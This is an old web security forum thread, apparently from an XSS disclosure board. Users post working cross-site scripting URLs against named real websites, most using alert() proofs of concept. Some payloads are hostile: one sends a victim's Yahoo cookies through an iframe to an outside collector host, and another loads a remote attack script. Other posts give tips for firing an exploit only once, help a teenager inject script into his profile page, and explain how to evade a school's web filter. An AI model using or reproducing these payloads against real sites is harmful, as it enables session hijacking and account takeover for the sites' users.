btw, for web pages that execute an injection many times, like that nexopia one (ten times) .. the easiest way i've found to only execute the exploit once, is to wrap it with this:

<script>if(typeof q=='undefined'){exploithere}q=5</script>

from the nexopia example: http://www.nexopia.com/header.php?bodyname='%3E%3Cscript%3Eif(typeof%20q=='undefined')%7Balert('JustOnce')%7Dq=5%3C/script%3E%3Cx

if the page already has a q variable, it won't work properly.. so best to pick a variable name like q5n.

-maluc

No XSS but really funny:

Not validating input:
http://www.hackersafe.com/site/en/merchants/moreinfo/?send=Y&interest=technology

And remember, it's hack0r safe!

haxxed without even trying.. >.>
http://www.hackersafe.com/error/msg.jsp?msg=Haxxored

-maluc

Ghehehe, yeah that's ridiculous while them boasting everywhere that the're such an authority.

that hackersafe is just the next lie in infosec. Providing that nice fuzzy false sense of security feeling. Makes good .biz i suppose.

http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

google intext:"hacker safe" ;)



Edited 1 time(s). Last edit at 11/09/2006 04:02AM by thomaspollet.

a two part xss, as you need to get a session ID first.

go here: https://cm.rsaconference.com/US07/portal/startNewRegistration.ww?hasRegCode=no&regCodeFormHidden=&zipFormHidden=
then here: https://cm.rsaconference.com/US07/portal/processCreateAccount.ww?password=&value%28profileValue_11088%29=XSS%22%3E%3Cscript%3Ealert(%22All%20your%20private%20keys%20are%20belong%20to%20me%5Cn%5Cn%22%2Bdocument.cookie)%3C/script%3E

-maluc

http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&

this one converts to uppercase, is there a XSS.JS up somewhere ? <SCRIPT SRC=HTTP://ATTACK.COM/XSS.JS> should work...

http://www.truste.org/ivalidate.php?companyName=Microsoft%20Corporation&sealid=105asdf'%3E%3Cscript%20src='http://ha.ckers.org/s.js

they issue SSL certs or something..

-maluc

HACKER SAFE©

http://www.dvdempire.com/Exec/v5_search_item.asp?userid=99365065948345&string=%22%3E%3Cscript%3Ealert%28%27hacker+safe%21%27%29%3B%3C%2Fscript%3E%3C%22&site_media_id=&site_id=4&pp=&used=0

http://www.goldnutritionstore.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert('H4cK0r%20Safe!!%20really,%20we%20truely%20are%20hacker%20safe,%20see%20the%20green%20logo.')%3C/script%3E%3C%22

This begs for it's own thread.

Made one.

- Kyran

http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&.x=0&.y=0

- Kyran

Since i disclosed it in another thread..
http://gallery.yahoo.com/error.php?e=--%3E%3Cscript%3Edocument.write('%3Ciframe%20src=http://scripts.sitesled.com/cookiemonster.html?'%2Bescape(document.cookie)%2B'%3Ehiya')%3C/script%3E%3Cx

-maluc

https://secure.fourseasons.com/secure/contact_us/gift_card_order_form.html?transaction_reference=&last_cc_number=&keyword=gift_card_order_form&contact_forms_link=141&contact_form_type=Hotel+Site&submission_counter=6&USD_100_cards=0&USD_250_cards=&USD_500_cards=&USD_1000_cards=&USD_2500_cards=&USD_5000_cards=&ship_method=domestic_express&USD_card_total=%240.00+US&USD_shipping=%240.00+US&USD_total=%240.00+US&cc_type=&cc_number=&cc_expiry=&email_confirmation=email_confirmation&email_address=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&billing_name_prefix=&billing_first_name=&billing_last_name=&billing_address_line_1=&billing_address_line_2=&billing_city=&billing_zip_or_postal_code=&billing_state_or_province=&billing_country=&billing_telephone_number=&billing_fax_number=&billing_mobile_number=&failed_email_address=&ship_to=same&enclosure_message=&enclosure_to=&enclosure_from=&verisign_result=&pobox_rejection=&success_message_redirect_action=&user_clicked_submit=true&field_meta_data_chart=%11USD+100+cards%10USD_100_cards%102%11USD+250+cards%10USD_250_cards%102%11USD+500+cards%10USD_500_cards%102%11USD+1000+cards%10USD_1000_cards%102%11USD+2500+cards%10USD_2500_cards%102%11USD+5000+cards%10USD_5000_cards%102%11Via%10ship_method%105%11Card+value+subtotal%10USD_card_total%1015%11Shipping%10USD_shipping%1015%11Credit+Card+will+be+charged%10USD_total%1015%11Credit+Card+Type%10cc_type%101%11Credit+Card+Number%10cc_number%102%11Credit+Card+Expiry%10cc_expiry%102%11Email+Confirmation%10email_confirmation%1015%11E-mail+Address%10email_address%102%11Prefix%10billing_name_prefix%102%11First+Name%10billing_first_name%102%11Last+Name%10billing_last_name%102%11Address+Line+1%10billing_address_line_1%102%11Address+Line+2%10billing_address_line_2%102%11City%10billing_city%102%11Zip+%2F+Postal+Code%10billing_zip_or_postal_code%102%11State+%2F+Province%10billing_state_or_province%102%11Country%10billing_country%101%11Telephone+Number%10billing_telephone_number%102%11Fax+Number%10billing_fax_number%102%11Mobile+Number%10billing_mobile_number%102%11Failed+E-mail+Address%10failed_email_address%1015%11Ship+to%10ship_to%105%11Prefix%10shipping_name_prefix%102%11First+Name%10shipping_first_name%102%11Last+Name%10shipping_last_name%102%11Address+Line+1%10shipping_address_line_1%102%11Address+Line+2%10shipping_address_line_2%102%11City%10shipping_city%102%11Zip+%2F+Postal+Code%10shipping_zip_or_postal_code%102%11State+%2F+Province%10shipping_state_or_province%102%11Country%10shipping_country%101%11Message%10enclosure_message%103%11To%10enclosure_to%102%11From%10enclosure_from%102%11Verisign+Result%10verisign_result%1015%11P.O.+Box+Rejection%10pobox_rejection%1015

- RSnake
Gotta love it. http://ha.ckers.org

Merliin posted a link to these guys so I thought I'd post my own link to them: http://www.opencores.org/search.cgi/do_search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

How about XSS as a means of web filter evasion? :)
EG. WebSense blocking a website.

*i'm brand new to this forum-- i only registered to ask this question lmao. and i did the little ('''') thing b/c i guess the word can be searched for somehow lol. so ignore it*

i've tried injecting every xss attack method into my('spa','c')e, but none of it seems to work. does anyone know any vulnerability that can be exploited so that i can put javascript on my page?

and you'd prolly have to email me the answer so it won't be discovered. (but tell me so i check my email.)

*edit: forgot to post email: adio.skater69@yahoo.com*



Edited 1 time(s). Last edit at 11/09/2006 07:39PM by adio_skater69.

kefka: are you asking a question or is that a reply to something? o.O and proxy sites should get around websense just perfectly - like proxydrop.com or google's translator service

adio: it seems they fixed both the fragmentation XSS holes .. but the quicktime one still works. It'll be a pain in the butt to debug an exploit for it, but doable.. and i'm not sure if it has access to the DOM or not.

-maluc

http://realtravel.com/search-results.aspx?destid=0&run=true&from=home&q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&submit.x=0&submit.y=0

- RSnake
Gotta love it. http://ha.ckers.org

kefka: websense blocks proxies & translator services, and some free domain hosts that allow cgi scripting (i.e. proxying), and since words are filtered in the url, it would probably send websense into a refreshing loop(but im sure they made it so that that doesnt happen). websense is vicious. my school has that. :(

maluc: where would i stick the code in the quicktime hole if they block out embeds? all i need is one exploit so that i can stick all of my js code into it. you seem like an expert lol.

A good proxy for going around websense type filters is your home PC. Just install a SOCKS5 server or an SSH tunnel.

adio_skater69: have a read of http://www.gnucitizen.org/blog/backdooring-quicktime-movies/

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

I previously wrote an article about proxying just about anything here: http://ha.ckers.org/ssh_proxy.html

When at client sites I would rather they didn't see me constantly going to a site with such a high grandma porn rating.

-id

http://shopping.discovery.com/stores/servlet/DirectEmailSignup?storeId=10000&langId=-1&catalogId=10000&email1=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&signupbutton.x=19&signupbutton.y=11

- RSnake
Gotta love it. http://ha.ckers.org

XSS is on (lotsopopups): http://www.tv.com/science-fiction/genre/10/az.html?era=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&g=10&tag=genre_tabs;all

- RSnake
Gotta love it. http://ha.ckers.org

I feel really bad for the people who run this domain:
http://www.test.com/servlet/com.test.servlet.account.Login?fromLogin=true&fromLogin=true&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&loginPassword=&logIntoPublicSite=true&groupLoginCode=

Quote from their website:

Quote

On a daily basis Test Central receives hundreds of reports concerning the misuse of its test.com domain name.

These misuses are outside of the control of Test Central and test.com. Such misuses include:

• Originators of bulk e-mail, and hackers who forge test.com as the sender of SPAM.

• Organizations who while building their web sites, use the test.com URL while testing the web site.

Many of the individuals who contact Test Central concerning the abuse of test.com are obviously concerned, but Test Central is in the business of providing online and enterprise assessment and survey technology, Test Central is not in the business or a party of misusing the capability of the internet including SPAMing the general public.

As a service to the public, we do attempt to track down those organizations and individuals responsible for such abuse. Any help one can provide Test Central and test.com would be greatly appreciated.

- RSnake
Gotta love it. http://ha.ckers.org

kefka or whoever: theres a proxy XSS in adidas.com that i'm sure won't be blocked then .. http://www.adidas.com/scripts/cud/cud.asp?call=registeremail&Postprocessor=http://tinyurl.com/2tx&dateofbirth_dd=1&dateofbirth_mm=1&dateofbirth_yyyy=1 but sadly, it pulls each page with a post so its a bit cumbersome. Instead just register for a free webhost somewhere and add a page that includes this script:

<script>
if (location.search.slice(1)) document.write('<iframe height="100%" width="100%" src="'+location.search.slice(1)+'"></iframe>');
</script>

Use: http://yoursite.com/proxy.html?http://google.com

adio: use the link whiteacid posted, worked great for me on myspace .. and you can add quicktime movies to your profile.. i'll put it back up on mine in a bit, to demonstrate.

-maluc

maluc, I don't think that would work because most of these types of programs look for any connections to the "bad" host in question. If they didn't you could simply spoof the referrer in your browser and it would work since that's no different than what that script would do from the network's perspective.

- RSnake
Gotta love it. http://ha.ckers.org

oh, ya i dunno what i was smoking.. makes no sense ^^

you'll have to host a php/asp/perl script somewhere .. i.e. setup a private proxy, to pull the page n show it. or if websense doesn't do reverse DNS lookups, the google translator frames go by an ip rather than a translate.google.com - might pass a reverse DNS regardless

http://64.233.179.104/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=ar%7Cen&u=http://asdf.com/&prev=/language_tools

-maluc

I don't know about WebSense. But it blocked it when I banned facebook.com at home from my Proventia M10. Thanks for the help though.

id your method worked just fine, that article rocks. Thanks. I'll let you know about WebSense, I'll see what I can do about being there to make sure they try correctly.

http://www.imvu.com/catalog/web_request_help.php?problem_type=asdf%3Cscript%3Ealert(document.cookie)%3C/script%3E

-maluc

http://www.bevmo.com/productlist.asp?Ntt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Ntk=All&D=&Nty=1

- RSnake
Gotta love it. http://ha.ckers.org